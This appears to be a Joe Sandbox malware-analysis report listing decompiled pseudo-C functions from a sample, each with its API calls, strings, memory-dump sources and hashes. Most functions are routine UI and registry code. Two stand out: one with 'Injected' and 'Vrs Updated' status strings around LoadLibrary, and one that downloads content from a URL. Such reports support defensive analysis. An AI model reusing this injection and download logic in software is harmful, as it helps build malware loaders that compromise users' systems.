				asm("movsd");
				asm("movsd");
				_t119 = __ecx;
				_v8 = __eax;
				_t145 =  *0x49de0c; // 0x49ebbc
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t148);
				_push(0x442da9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t148 + 0xffffffe0;
				E0043AFAC(_v8, __ecx, __ecx, _t145);
				_v16 = _v16 + 4;
				E0043C1D4(_v8,  &_v28);
				if(E00458218() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E00458218() -  *(_v8 + 0x4c);
				}
				if(E00458224() <  *(_v8 + 0x48) + _v28) {
					_v28 = E00458224() -  *(_v8 + 0x48);
				}
				if(E0045820C() > _v28) {
					_v28 = E0045820C();
				}
				if(E00458200() > _v16) {
					_v16 = E00458200();
				}
				SetWindowPos(E00441704(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404C80(_t119) < 0x64 &&  *0x49bc1c != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E00445E24( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x49bc1c(E00441704(_v8), 0x64,  *0x0049BD24 | 0x00040000);
					}
				}
				_t80 =  *0x49dbcc; // 0x49ebb8
				E0043EE38(_v8,  *((intOrPtr*)( *_t80 + 0x30)));
				ShowWindow(E00441704(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t136);
				 *[fs:eax] = _t136;
				_push(0x442db0);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t91 = _v8;
				 *((char*)(_t91 + 0x210)) = 0;
				return _t91;
			}
















                                                                                                                                                                                                                            0x00442bde
                                                                                                                                                                                                                            0x00442bdf
                                                                                                                                                                                                                            0x00442be0
                                                                                                                                                                                                                            0x00442be1
                                                                                                                                                                                                                            0x00442be2
                                                                                                                                                                                                                            0x00442be4
                                                                                                                                                                                                                            0x00442be7
                                                                                                                                                                                                                            0x00442bf0
                                                                                                                                                                                                                            0x00442bf9
                                                                                                                                                                                                                            0x00442bfa
                                                                                                                                                                                                                            0x00442bff
                                                                                                                                                                                                                            0x00442c02
                                                                                                                                                                                                                            0x00442c0a
                                                                                                                                                                                                                            0x00442c0f
                                                                                                                                                                                                                            0x00442c19
                                                                                                                                                                                                                            0x00442c30
                                                                                                                                                                                                                            0x00442c3f
                                                                                                                                                                                                                            0x00442c3f
                                                                                                                                                                                                                            0x00442c54
                                                                                                                                                                                                                            0x00442c63
                                                                                                                                                                                                                            0x00442c63
                                                                                                                                                                                                                            0x00442c70
                                                                                                                                                                                                                            0x00442c79
                                                                                                                                                                                                                            0x00442c79
                                                                                                                                                                                                                            0x00442c86
                                                                                                                                                                                                                            0x00442c8f
                                                                                                                                                                                                                            0x00442c8f
                                                                                                                                                                                                                            0x00442cb5
                                                                                                                                                                                                                            0x00442ccd
                                                                                                                                                                                                                            0x00442cf5
                                                                                                                                                                                                                            0x00442cfe
                                                                                                                                                                                                                            0x00442d0d
                                                                                                                                                                                                                            0x00442d16
                                                                                                                                                                                                                            0x00442d24
                                                                                                                                                                                                                            0x00442d2f
                                                                                                                                                                                                                            0x00442d2f
                                                                                                                                                                                                                            0x00442d2f
                                                                                                                                                                                                                            0x00442d53
                                                                                                                                                                                                                            0x00442d53
                                                                                                                                                                                                                            0x00442cfe
                                                                                                                                                                                                                            0x00442d59
                                                                                                                                                                                                                            0x00442d66
                                                                                                                                                                                                                            0x00442d76
                                                                                                                                                                                                                            0x00442d80
                                                                                                                                                                                                                            0x00442d85
                                                                                                                                                                                                                            0x00442d88
                                                                                                                                                                                                                            0x00442d8b
                                                                                                                                                                                                                            0x00442d98
                                                                                                                                                                                                                            0x00442d9e
                                                                                                                                                                                                                            0x00442da1
                                                                                                                                                                                                                            0x00442da8

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442CB5
                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00442CBA
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 00442CF5
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 00442D0D
                                                                                                                                                                                                                            • AnimateWindow.USER32(00000000,00000064,00000001), ref: 00442D53
                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442D76
                                                                                                                                                                                                                              • Part of subcall function 00445E24: GetCursorPos.USER32(?), ref: 00445E28
                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00442D90
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3024527889-0
                                                                                                                                                                                                                            • Opcode ID: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
                                                                                                                                                                                                                            • Instruction ID: ec947e6fb4e605e95c0b99b07f50ee8800e03fd8639e7176e4c102910f3e7fae
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F513D74A00109DFEB10DF99C986E9EB7F5AF04304F6045AAF500EB395DB78AE40DB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00458464 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                            			E00458464(intOrPtr __eax, void* __ebx, void* __fp0) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;
				void* _t129;

				_t129 = __fp0;
				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x45860f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x458616);
					return E004049C0( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E00403BBC(1);
					E004049C0(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E0041D5D8( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E00446294( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E0040A5E4( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x4585cb);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E00404C30( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E00404C30(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x4585d2);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}





















                                                                                                                                                                                                                            0x00458464
                                                                                                                                                                                                                            0x00458465
                                                                                                                                                                                                                            0x00458467
                                                                                                                                                                                                                            0x00458470
                                                                                                                                                                                                                            0x00458476
                                                                                                                                                                                                                            0x0045847b
                                                                                                                                                                                                                            0x0045847c
                                                                                                                                                                                                                            0x00458481
                                                                                                                                                                                                                            0x00458484
                                                                                                                                                                                                                            0x0045848e
                                                                                                                                                                                                                            0x004585f0
                                                                                                                                                                                                                            0x004585f8
                                                                                                                                                                                                                            0x004585fb
                                                                                                                                                                                                                            0x004585fe
                                                                                                                                                                                                                            0x0045860e
                                                                                                                                                                                                                            0x00458494
                                                                                                                                                                                                                            0x004584a3
                                                                                                                                                                                                                            0x004584ac
                                                                                                                                                                                                                            0x004584bf
                                                                                                                                                                                                                            0x004584c2
                                                                                                                                                                                                                            0x004585df
                                                                                                                                                                                                                            0x004585e5
                                                                                                                                                                                                                            0x004585eb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004584c8
                                                                                                                                                                                                                            0x004584c9
                                                                                                                                                                                                                            0x004584d2
                                                                                                                                                                                                                            0x004584d5
                                                                                                                                                                                                                            0x004584e1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004584e7
                                                                                                                                                                                                                            0x004584f9
                                                                                                                                                                                                                            0x004584ff
                                                                                                                                                                                                                            0x00458529
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045852f
                                                                                                                                                                                                                            0x00458531
                                                                                                                                                                                                                            0x00458532
                                                                                                                                                                                                                            0x00458537
                                                                                                                                                                                                                            0x0045853a
                                                                                                                                                                                                                            0x0045853d
                                                                                                                                                                                                                            0x00458563
                                                                                                                                                                                                                            0x00458576
                                                                                                                                                                                                                            0x0045858e
                                                                                                                                                                                                                            0x0045859c
                                                                                                                                                                                                                            0x004585af
                                                                                                                                                                                                                            0x004585af
                                                                                                                                                                                                                            0x0045859c
                                                                                                                                                                                                                            0x004585b6
                                                                                                                                                                                                                            0x004585b9
                                                                                                                                                                                                                            0x004585bc
                                                                                                                                                                                                                            0x004585ca
                                                                                                                                                                                                                            0x004585ca
                                                                                                                                                                                                                            0x00458529
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004585d2
                                                                                                                                                                                                                            0x004585d2
                                                                                                                                                                                                                            0x004585d6
                                                                                                                                                                                                                            0x004585d6
                                                                                                                                                                                                                            0x004585d6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004584d5
                                                                                                                                                                                                                            0x004584c2
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyboardLayoutList.USER32(00000040,?,00000000,0045860F,?,00000000,?,00458671,00000000,?,0043D4D3), ref: 004584BA
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00458522
                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 0045855C
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,004585D2,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 004585C5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • layout text, xrefs: 00458553
                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 0045850C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                                                                                                                                                                            • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                                                                                                                                                                            • API String ID: 1703357764-2652665750
                                                                                                                                                                                                                            • Opcode ID: 8cc75bf8530aa7b8bc3295c685c4afb19f65476633fa01bc8007fe3bd1315606
                                                                                                                                                                                                                            • Instruction ID: 7c903f8fd9ad85d3247752ddaabe7f8220cad0ab59f1ef766b0bf81713acb4c4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cc75bf8530aa7b8bc3295c685c4afb19f65476633fa01bc8007fe3bd1315606
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D415174A0420DAFDB10DF55C981B9EB7F8EB48305F5140EAE904B7352DB78AE04CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004288B4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                            			E004288B4(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				struct HDC__* _t43;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t77;
				void* _t80;
				void* _t83;
				void* _t85;
				intOrPtr _t86;

				_t83 = _t85;
				_t86 = _t85 + 0xffffffdc;
				_t80 = __edx;
				_t65 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E004032B4( &_v38, 0x16);
					_t67 =  *((intOrPtr*)(_t65 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t67 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_t43 = E00426DA8( &_v38);
					_v18 = _t43;
					_push(0);
					L00407638();
					_v16 = _t43;
					_push(_t83);
					_push(0x4289ef);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
					_v8 = E0040275C(_v12);
					_push(_t83);
					_push(0x4289cf);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
						E00425FB8(_t67);
					}
					E0041D904(_t80, 0x16,  &_v38);
					E0041D904(_t80, _v12, _v8);
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x4289d6);
					return E0040277C(_v8);
				}
			}






















                                                                                                                                                                                                                            0x004288b5
                                                                                                                                                                                                                            0x004288b7
                                                                                                                                                                                                                            0x004288bc
                                                                                                                                                                                                                            0x004288be
                                                                                                                                                                                                                            0x004288c4
                                                                                                                                                                                                                            0x004289fb
                                                                                                                                                                                                                            0x004288ca
                                                                                                                                                                                                                            0x004288d4
                                                                                                                                                                                                                            0x004288d9
                                                                                                                                                                                                                            0x004288dc
                                                                                                                                                                                                                            0x004288e3
                                                                                                                                                                                                                            0x004288ea
                                                                                                                                                                                                                            0x004288f4
                                                                                                                                                                                                                            0x004288ec
                                                                                                                                                                                                                            0x004288ec
                                                                                                                                                                                                                            0x004288ec
                                                                                                                                                                                                                            0x0042890b
                                                                                                                                                                                                                            0x00428922
                                                                                                                                                                                                                            0x00428929
                                                                                                                                                                                                                            0x0042892e
                                                                                                                                                                                                                            0x00428932
                                                                                                                                                                                                                            0x00428934
                                                                                                                                                                                                                            0x00428939
                                                                                                                                                                                                                            0x0042893e
                                                                                                                                                                                                                            0x0042893f
                                                                                                                                                                                                                            0x00428944
                                                                                                                                                                                                                            0x00428947
                                                                                                                                                                                                                            0x0042895d
                                                                                                                                                                                                                            0x00428968
                                                                                                                                                                                                                            0x0042896d
                                                                                                                                                                                                                            0x0042896e
                                                                                                                                                                                                                            0x00428973
                                                                                                                                                                                                                            0x00428976
                                                                                                                                                                                                                            0x00428993
                                                                                                                                                                                                                            0x00428995
                                                                                                                                                                                                                            0x00428995
                                                                                                                                                                                                                            0x004289a4
                                                                                                                                                                                                                            0x004289b1
                                                                                                                                                                                                                            0x004289b8
                                                                                                                                                                                                                            0x004289bb
                                                                                                                                                                                                                            0x004289be
                                                                                                                                                                                                                            0x004289ce
                                                                                                                                                                                                                            0x004289ce

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,000009EC), ref: 00428906
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,000009EC), ref: 0042891D
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 00428934
                                                                                                                                                                                                                            • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,004289EF,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00428958
                                                                                                                                                                                                                            • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,004289CF,?,?,00000000,00000000,00000008,?,00000000,004289EF), ref: 0042898B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: BitsFileMeta
                                                                                                                                                                                                                            • String ID: `
                                                                                                                                                                                                                            • API String ID: 858000408-2679148245
                                                                                                                                                                                                                            • Opcode ID: a9f53bc28096eb00c5e5236918538b4a0fd584b4a4d8f7f8bd18cc9ec4334467
                                                                                                                                                                                                                            • Instruction ID: f2e5e9c8815675a612d27dd2057d142453f41d2d556f4b9068e3620b80c0e0fa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a9f53bc28096eb00c5e5236918538b4a0fd584b4a4d8f7f8bd18cc9ec4334467
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6314575B00218ABDB01EFD5D882ABEB7B8EF4D704F50445AF904FB281D678AD40D7A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00477940 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00477940(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				struct HINSTANCE__* _t45;
				struct HINSTANCE__* _t47;
				void* _t50;
				struct HINSTANCE__* _t51;
				struct HINSTANCE__* _t60;
				intOrPtr _t80;
				intOrPtr _t85;
				void* _t93;
				void* _t94;
				intOrPtr _t95;
				void* _t96;

				_t96 = __eflags;
				_t91 = __esi;
				_t90 = __edi;
				_t93 = _t94;
				_t95 = _t94 + 0xfffffff0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v20 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				E00404E70(_v16);
				_push(_t93);
				_push(0x477a75);
				_push( *[fs:eax]);
				 *[fs:eax] = _t95;
				if(E00409A48(_v8, _t96) != 0) {
					_push(_t93);
					_push(0x477a50);
					_push( *[fs:eax]);
					 *[fs:eax] = _t95;
					 *0x49ec78 = LoadLibraryA(E00404E80(_v8));
					_t45 =  *0x49ec78; // 0x0
					if(E004770E4(_t45, 0, _v16, __edi, __esi) != 0) {
						_t47 =  *0x49ec78; // 0x0
						E0047717C(_t47, 0,  &_v20, _v16, _t90, _t91);
						_t50 = E00409628(_v20, _t93, __eflags);
						__eflags = _t50 - _a12;
						if(_t50 >= _a12) {
							_t51 =  *0x49ec78; // 0x0
							FreeLibrary(_t51);
							E00404CCC(_a4, _v8, "Injected Canceled-> ");
						} else {
							E004774A8(_v8, 0, _v12, _t90, _t91, 1);
							E00404CCC(_a4, _v8, "Vrs Updated -> ");
						}
					} else {
						_t60 =  *0x49ec78; // 0x0
						FreeLibrary(_t60);
						E004774A8(_v8, 0, _v12, _t90, _t91, 0);
						E00404CCC(_a4, _v8, "Completed -> ");
					}
					_pop(_t85);
					 *[fs:eax] = _t85;
				}
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(0x477a7c);
				return E004049E4( &_v20, 4);
			}


















                                                                                                                                                                                                                            0x00477940
                                                                                                                                                                                                                            0x00477940
                                                                                                                                                                                                                            0x00477940
                                                                                                                                                                                                                            0x00477941
                                                                                                                                                                                                                            0x00477943
                                                                                                                                                                                                                            0x00477946
                                                                                                                                                                                                                            0x00477947
                                                                                                                                                                                                                            0x00477948
                                                                                                                                                                                                                            0x0047794b
                                                                                                                                                                                                                            0x0047794e
                                                                                                                                                                                                                            0x00477951
                                                                                                                                                                                                                            0x00477954
                                                                                                                                                                                                                            0x0047795a
                                                                                                                                                                                                                            0x00477962
                                                                                                                                                                                                                            0x0047796a
                                                                                                                                                                                                                            0x00477971
                                                                                                                                                                                                                            0x00477972
                                                                                                                                                                                                                            0x00477977
                                                                                                                                                                                                                            0x0047797a
                                                                                                                                                                                                                            0x00477987
                                                                                                                                                                                                                            0x0047798f
                                                                                                                                                                                                                            0x00477990
                                                                                                                                                                                                                            0x00477995
                                                                                                                                                                                                                            0x00477998
                                                                                                                                                                                                                            0x004779a9
                                                                                                                                                                                                                            0x004779b1
                                                                                                                                                                                                                            0x004779bd
                                                                                                                                                                                                                            0x004779f2
                                                                                                                                                                                                                            0x004779f7
                                                                                                                                                                                                                            0x004779ff
                                                                                                                                                                                                                            0x00477a04
                                                                                                                                                                                                                            0x00477a07
                                                                                                                                                                                                                            0x00477a2b
                                                                                                                                                                                                                            0x00477a31
                                                                                                                                                                                                                            0x00477a41
                                                                                                                                                                                                                            0x00477a09
                                                                                                                                                                                                                            0x00477a14
                                                                                                                                                                                                                            0x00477a24
                                                                                                                                                                                                                            0x00477a24
                                                                                                                                                                                                                            0x004779bf
                                                                                                                                                                                                                            0x004779bf
                                                                                                                                                                                                                            0x004779c5
                                                                                                                                                                                                                            0x004779d5
                                                                                                                                                                                                                            0x004779e5
                                                                                                                                                                                                                            0x004779e5
                                                                                                                                                                                                                            0x00477a48
                                                                                                                                                                                                                            0x00477a4b
                                                                                                                                                                                                                            0x00477a4b
                                                                                                                                                                                                                            0x00477a5c
                                                                                                                                                                                                                            0x00477a5f
                                                                                                                                                                                                                            0x00477a62
                                                                                                                                                                                                                            0x00477a74

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00477A50,?,00000000,00477A75), ref: 004779A4
                                                                                                                                                                                                                              • Part of subcall function 004770E4: FindResourceA.KERNEL32(?,00000000,0000000A), ref: 00477120
                                                                                                                                                                                                                              • Part of subcall function 004770E4: FreeResource.KERNEL32(00000000,?,00000000,0000000A,00000000,0047713F,?,00000000,0047716D), ref: 00477130
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,00000000,00477A50,?,00000000,00477A75), ref: 004779C5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeLibraryResource$FindLoad
                                                                                                                                                                                                                            • String ID: Completed -> $Injected Canceled-> $Vrs Updated ->
                                                                                                                                                                                                                            • API String ID: 622515136-3620720946
                                                                                                                                                                                                                            • Opcode ID: 66de7adaf98f1cf7769a9c04e92696b8a01e4c8dc0b3f0b8a8594ae9463f5719
                                                                                                                                                                                                                            • Instruction ID: ba9099d9801d0205c677ecf17e877f95f1885b5d0e30a850265bd7c2820a7478
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66de7adaf98f1cf7769a9c04e92696b8a01e4c8dc0b3f0b8a8594ae9463f5719
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E317874A08204AFEB00EFA5D8519DE77B4EB89314B60C47BF908B7391D739AE01CB58
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00474FC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89networkfileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 59%
                                                                                                                                                                                                                            			E00474FC0(void* __eax, void* __ebx, void* __edx, void* __esi) {
				void* _v8;
				void* _v12;
				long _v16;
				void _v1042;
				char _v1048;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t60;
				void* _t62;
				void* _t63;
				intOrPtr _t64;

				_t62 = _t63;
				_t64 = _t63 + 0xfffffbec;
				_v1048 = 0;
				_t47 = __edx;
				_t60 = __eax;
				_push(_t62);
				_push(0x4750fb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t64;
				E004049C0(__edx);
				_v8 = InternetOpenA("MyApp", 0, 0, 0, 0);
				_push(_t62);
				_push(0x4750db);
				_push( *[fs:eax]);
				 *[fs:eax] = _t64;
				if(_v8 == 0) {
					L6:
					_pop(_t55);
					 *[fs:eax] = _t55;
					_push(0x4750e2);
					return InternetCloseHandle(_v8);
				} else {
					_v12 = InternetOpenUrlA(_v8, E00404E80(_t60), 0, 0, 0x84000000, 0);
					if(_v12 == 0) {
						goto L6;
					} else {
						_push(_t62);
						_push(0x4750bd);
						_push( *[fs:eax]);
						 *[fs:eax] = _t64;
						while(1) {
							_v16 = 0x400;
							InternetReadFile(_v12,  &_v1042, 0x400,  &_v16);
							if(_v16 == 0) {
								break;
							}
							 *((char*)(_t62 + _v16 - 0x40e)) = 0;
							E00404C30( &_v1048, 0x402,  &_v1042);
							E00404C88(_t47, _v1048);
						}
						_pop(_t56);
						 *[fs:eax] = _t56;
						_push(0x4750c4);
						return InternetCloseHandle(_v12);
					}
				}
			}















                                                                                                                                                                                                                            0x00474fc1
                                                                                                                                                                                                                            0x00474fc3
                                                                                                                                                                                                                            0x00474fcd
                                                                                                                                                                                                                            0x00474fd3
                                                                                                                                                                                                                            0x00474fd5
                                                                                                                                                                                                                            0x00474fd9
                                                                                                                                                                                                                            0x00474fda
                                                                                                                                                                                                                            0x00474fdf
                                                                                                                                                                                                                            0x00474fe2
                                                                                                                                                                                                                            0x00474fe7
                                                                                                                                                                                                                            0x00474ffe
                                                                                                                                                                                                                            0x00475003
                                                                                                                                                                                                                            0x00475004
                                                                                                                                                                                                                            0x00475009
                                                                                                                                                                                                                            0x0047500c
